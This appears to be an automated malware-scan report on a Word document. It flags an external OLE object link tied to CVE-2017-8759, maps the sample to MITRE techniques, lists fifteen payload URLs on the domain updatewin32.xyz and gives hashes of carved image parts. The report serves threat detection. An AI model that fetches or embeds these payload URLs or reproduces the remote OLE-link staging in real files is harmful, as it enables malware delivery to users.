MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample is an OOXML document that contains an external OLE object relationship pointing to a remote URL, indicating an attempt to download a secondary payload. This is further supported by a heuristic firing related to CVE-2017-8759, a known vulnerability in Office that can be exploited via OLE objects. The embedded URL is likely used to deliver the malicious content.
Heuristics 3
-
OOXML OLE2Link remote document — CVE-2017-8759 related high CVE_2017_8759_RELATEDDocument contains an o:OLEObject Type=Link whose external oleObject relationship fetches a remote Office-looking document. That is the OOXML OLE2Link staging shape used by CVE-2017-8759 campaigns when the remote document/WSDL supplies the SOAP moniker payload; the local file alone does not contain the WSDL body needed for an exact match.
-
External OLE object relationship high OOXML_EXTERNAL_OLE_OBJECTDocument contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through OLE/object update paths rather than as a normal user-clicked hyperlink.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://updatewin32.xyz/microsoft/4.doc In document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/9.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/13.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/6.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/1.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/8.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/10.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/3.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/12.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/14.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/5.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/2.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/7.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/11.docIn document text (OOXML body / shared strings)
- https://updatewin32.xyz/microsoft/15.docIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 15
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
emf_00.emf |
ooxml-emf | OOXML EMF part: word/media/image2.emf | 5812 bytes |
SHA-256: 6c60b1cc47b0f4235e6176940d1333018145d0ddead9375efbbdf821874c24b6 |
|||
emf_01.emf |
ooxml-emf | OOXML EMF part: word/media/image3.emf | 5812 bytes |
SHA-256: 409890249b6de9967ac77560c242dab99bf602904a565bd831ff5e3860b61414 |
|||
emf_02.emf |
ooxml-emf | OOXML EMF part: word/media/image4.emf | 5812 bytes |
SHA-256: b802d16f5cbfbab47df75b845ae2dd974fc5befc21ccd2244c9810e7cdc6c41a |
|||
emf_03.emf |
ooxml-emf | OOXML EMF part: word/media/image5.emf | 5812 bytes |
SHA-256: 1ae00226a550104a43358b658ad21228e923c27d1f38514163ce936d52b5313c |
|||
emf_04.emf |
ooxml-emf | OOXML EMF part: word/media/image6.emf | 5812 bytes |
SHA-256: b560c4963e22ca6d492c5d4b5f133cec41086f329ae3cfd6cbc832b47cf5d240 |
|||
emf_05.emf |
ooxml-emf | OOXML EMF part: word/media/image7.emf | 5812 bytes |
SHA-256: 186f11ae41101fe4d2a44a15e36c45087a97a291bb4752297e2ce3d44bbca85f |
|||
emf_06.emf |
ooxml-emf | OOXML EMF part: word/media/image8.emf | 5812 bytes |
SHA-256: 59888c0f9173bbe27552d144df00f881043810661b2d1799334358e7bc9393cb |
|||
emf_07.emf |
ooxml-emf | OOXML EMF part: word/media/image9.emf | 5812 bytes |
SHA-256: 06af1bb9d63c1a39e6acc92dfa9cff42c27c940437015242cacfd15219831b57 |
|||
emf_08.emf |
ooxml-emf | OOXML EMF part: word/media/image10.emf | 5812 bytes |
SHA-256: d57e92ce688b02264224dc44841328390a26ae8167358e3bc653991edc448463 |
|||
emf_09.emf |
ooxml-emf | OOXML EMF part: word/media/image11.emf | 5820 bytes |
SHA-256: aa5e11ed31ad6938bb7951477ce36c99e6082362f9bb3a389633c0ce4f49e00a |
|||
emf_10.emf |
ooxml-emf | OOXML EMF part: word/media/image12.emf | 5820 bytes |
SHA-256: d26858dcbdf5a96a83cd3c7f585dec32932d30fc9333812684256ec830d54e61 |
|||
emf_11.emf |
ooxml-emf | OOXML EMF part: word/media/image13.emf | 5820 bytes |
SHA-256: 28f774ded68d0e6e9a9548f6a7e991260802ac448ada202603ce8c74f163efea |
|||
emf_12.emf |
ooxml-emf | OOXML EMF part: word/media/image14.emf | 5820 bytes |
SHA-256: 7a36582358ccdd6ad6707e8c8555b506b06c17d2e9ac75685673cb9eda130b10 |
|||
emf_13.emf |
ooxml-emf | OOXML EMF part: word/media/image15.emf | 5820 bytes |
SHA-256: 73920789bdeae4afbcafbfde0789db87e1aacd39b1be937bbe31d388e0ce8d85 |
|||
emf_14.emf |
ooxml-emf | OOXML EMF part: word/media/image16.emf | 5820 bytes |
SHA-256: c0056f4c7d2501d4587968859a859fb7bc2796e89bcdae192577449bc6c30668 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.